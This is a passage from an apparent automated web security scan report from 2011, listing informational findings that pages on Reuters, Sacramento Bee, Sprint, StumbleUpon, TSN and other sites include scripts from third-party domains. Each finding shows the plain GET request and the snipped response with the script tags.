<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.55. http://www.reuters.com/video/2011/08/18/lockheed-martin-presents-airship-of-the

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /video/2011/08/18/lockheed-martin-presents-airship-of-the

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/2011/08/18/lockheed-martin-presents-airship-of-the HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:26:56 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:31:57 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160

<!--[if !IE]> App Server /S264630NJ2XSF70/ <![endif]-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.56. http://www.reuters.com/video/2011/08/22/buenos-aires-fashion-week-sizzles

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /video/2011/08/22/buenos-aires-fashion-week-sizzles

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/2011/08/22/buenos-aires-fashion-week-sizzles HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:26:55 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:31:55 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160

<!--[if !IE]> App Server /S264630NJ2XSF61/ <![endif]-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.57. http://www.reuters.com/video/2011/08/26/experimental-plane-reaches-13000-mph

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /video/2011/08/26/experimental-plane-reaches-13000-mph

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/2011/08/26/experimental-plane-reaches-13000-mph HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:26:57 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:31:58 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160

<!--[if !IE]> App Server /S264630NJ2XSF48/ <![endif]-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.58. http://www.reuters.com/video/2011/09/02/job-angst-disrupts-stock-market

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /video/2011/09/02/job-angst-disrupts-stock-market

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/2011/09/02/job-angst-disrupts-stock-market HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:26:50 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:31:50 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160

<!--[if !IE]> App Server /S264630NJ2XSF63/ <![endif]-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.59. http://www.reuters.com/video/2011/09/02/job-seeker-finds-job-in-tough-times

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /video/2011/09/02/job-seeker-finds-job-in-tough-times

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/2011/09/02/job-seeker-finds-job-in-tough-times HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:26:48 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:31:49 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160

<!--[if !IE]> App Server /S264630NJ2XSF48/ <![endif]-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.60. http://www.reuters.com/video/2011/09/03/cias-close-links-with-gaddafi-revealed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /video/2011/09/03/cias-close-links-with-gaddafi-revealed

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/2011/09/03/cias-close-links-with-gaddafi-revealed HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:26:41 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:31:41 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160

<!--[if !IE]> App Server /S264630NJ2XSF67/ <![endif]-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.61. http://www.reuters.com/video/2011/09/03/dsk-departs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /video/2011/09/03/dsk-departs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/2011/09/03/dsk-departs HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:26:44 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:31:45 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160

<!--[if !IE]> App Server /S264630NJ2XSF54/ <![endif]-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.62. http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html HTTP/1.1
Host: www.sacbee.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 96501
Expires: Sun, 04 Sep 2011 00:57:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:57:44 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
<!-- JavaScript files -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
...[SNIP]...
<div class="lingospot_more_stories_widget">
<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=LSXLXVUXQN&format=embed&mode=data&count=3&width=320"></script>
...[SNIP]...
<div class="lingospot_around_the_web_widget">
<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=ZXANLLFMOV&format=embed&mode=data&width=300"></script>
...[SNIP]...
<div id='mi_top_job' style="">
<script type='text/javascript' src='http://rtq.careerbuilder.com/RTQ/jobstream.aspx?lr=CBMC_SB&rssid=MC_SB_jbstrm&num=&kw=CustomField3:SACBEETJ&cat=All&rad=50&state=&city=&zip=&ddtitle=false&ddcompany=false&sb=[& mi_cb_search_box &]'></script>
...[SNIP]...
<div style="background-color: #f9f9f9; padding: 5px; border: 3px solid #efefef; border-top: none;">
       <script language="javascript" type="text/javascript" src="http://www.cars.com/includes/js/used-car-widget_driver.js"></script><!-- pulls in our model table. cars.com hosts the script to ensure its accuracy -->
       <script language="javascript" type="text/javascript" src="http://www.cars.com/includes/js/makemodels-used.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js"></script>
...[SNIP]...
<div id="MI_post_load" style="display:none;">


<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=3_Sacbee"></script>
...[SNIP]...

21.63. http://www.sacbee.com/classified-ads/Obituaries%20&%20In%20Memoriams/classification/In%20Memoriams

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /classified-ads/Obituaries%20&%20In%20Memoriams/classification/In%20Memoriams

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /classified-ads/Obituaries%20&%20In%20Memoriams/classification/In%20Memoriams HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Content-Type: text/html
Expires: Sun, 04 Sep 2011 01:27:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121640


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>

<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new Da
...[SNIP]...
<!-- * jQuery library -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...
<!-- ********************************************* USED widget code ************************************ -->

       <script type="text/javascript" src="http://www.cars.com/includes/js/used-car-widget_driver.js"></script><!-- pulls in our model table. cars.com hosts the script to ensure its accuracy -->
       <script type="text/javascript" src="http://www.cars.com/includes/js/makemodels-used.js">
       </script>
...[SNIP]...
</script>
<script language="javascript" src="http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js"></script>
...[SNIP]...

21.64. http://www.sacbee.com/mr/b.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /mr/b.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mr/b.gif HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Cache-Control: max-age=0
Date: Sun, 04 Sep 2011 01:27:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
<!-- JavaScript files -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
...[SNIP]...
<div style="float:right">
<script src="http://get.lingospot.com/ls.js?key=LSXLXVUXQN&format=embed&mode=data&count=3&width=320" type="text/javascript"></script>
...[SNIP]...
<!-- start Lingospot web stories -->
<script type="text/javascript" src="http://get.lingospot.com/ls.js?key=ZXANLLFMOV&format=embed&mode=data&width=300"></script>
...[SNIP]...
<div id="MI_post_load" style="display:none;">


<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=3_Sacbee"></script>
...[SNIP]...

21.65. http://www.sacbee.com/mr/e.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /mr/e.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mr/e.gif HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Cache-Control: max-age=0
Date: Sun, 04 Sep 2011 01:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
<!-- JavaScript files -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
...[SNIP]...
<div style="float:right">
<script src="http://get.lingospot.com/ls.js?key=LSXLXVUXQN&format=embed&mode=data&count=3&width=320" type="text/javascript"></script>
...[SNIP]...
<!-- start Lingospot web stories -->
<script type="text/javascript" src="http://get.lingospot.com/ls.js?key=ZXANLLFMOV&format=embed&mode=data&width=300"></script>
...[SNIP]...
<div id="MI_post_load" style="display:none;">


<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=3_Sacbee"></script>
...[SNIP]...

21.66. http://www.sacbee.com/mr/f.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /mr/f.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mr/f.gif HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Cache-Control: max-age=0
Date: Sun, 04 Sep 2011 01:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
<!-- JavaScript files -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
...[SNIP]...
<div style="float:right">
<script src="http://get.lingospot.com/ls.js?key=LSXLXVUXQN&format=embed&mode=data&count=3&width=320" type="text/javascript"></script>
...[SNIP]...
<!-- start Lingospot web stories -->
<script type="text/javascript" src="http://get.lingospot.com/ls.js?key=ZXANLLFMOV&format=embed&mode=data&width=300"></script>
...[SNIP]...
<div id="MI_post_load" style="display:none;">


<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=3_Sacbee"></script>
...[SNIP]...

21.67. http://www.sacbee.com/reg-bin/int.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /reg-bin/int.cgi

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
<!-- JavaScript files -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js"></script>
...[SNIP]...

21.68. http://www.sacbee.com/reg-bin/tint.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /reg-bin/tint.cgi

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reg-bin/tint.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds019p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
<!-- JavaScript files -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js"></script>
...[SNIP]...

21.69. https://www.sprint.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:01:50 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 16842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
</script>
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

21.70. https://www.sprint.net/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:27:57 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 16851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
</script>
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

21.71. http://www.stumbleupon.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /submit HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 7352
Date: Sun, 04 Sep 2011 01:27:58 GMT
Age: 0
Via: 1.1 varnish
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<![endif]-->
       
       
           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110819-00"></script>
...[SNIP]...
<!-- end wrapper -->

   <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110819-00"></script>
...[SNIP]...

21.72. http://www.thatsracin.com/reg-bin/int.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thatsracin.com
Path:   /reg-bin/int.cgi

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>


<head>


<title></title>


        <meta http-equiv="Content-Type" content="
...[SNIP]...
</script>


<script
type="text/javascript"
src="http://media.charlotteobserver.com/static/js/jquery-1.2.3.min.js">
</script>
<script
type="text/javascript"
src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.2/jquery-ui.min.js">

</script>
...[SNIP]...

21.73. http://www.tsn.ca/ncaa/story/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tsn.ca
Path:   /ncaa/story/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ncaa/story/ HTTP/1.1
Host: www.tsn.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:27 GMT
Connection: close
Content-Length: 24835


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head id="ctl00_he
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www2.tsn.ca/styles/min/story/131479214.css" />
<script type="text/javascript" src="http://www2.tsn.ca/scripts/min/story/head/131479214.js"></script>
   <script type="text/javascript" src="http://www2.tsn.ca/scripts/broadband/feature.js"></script>
...[SNIP]...
</meta><script type="text/javascript" src="http://www2.tsn.ca/scripts/broadband/ncaa.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ad.ca.doubleclick.net/adj/ctv.tsn.ca/ncaa;mode=;loc=header;adpg=ncaa;adpg2=story;sect=;arena=sports;unit=dhtml;kw=;pos=;dcopt=ist;sz=728x90;tile=1;ord=2011932128270;sops=empty?"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://metrics.ctvdigital.net/global/globalpagetracking.js"></script>
<script type="text/javascript" src="http://watch.tsn.ca/js/OneClip.aspx" ></script>

<script type="text/javascript" src="http://www2.tsn.ca/scripts/min/story/foot/131479214.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://metrics.ctvdigital.net/comscore/beacon.js"></script>
...[SNIP]...

21.74. http://www.und.com/allaccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.und.com
Path:   /allaccess/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /allaccess/ HTTP/1.1
Host: www.und.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:27:56 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<link href="http://grfx.cstv.com/library/css/global-v2-vip.css" rel="stylesheet" type="text/css" />

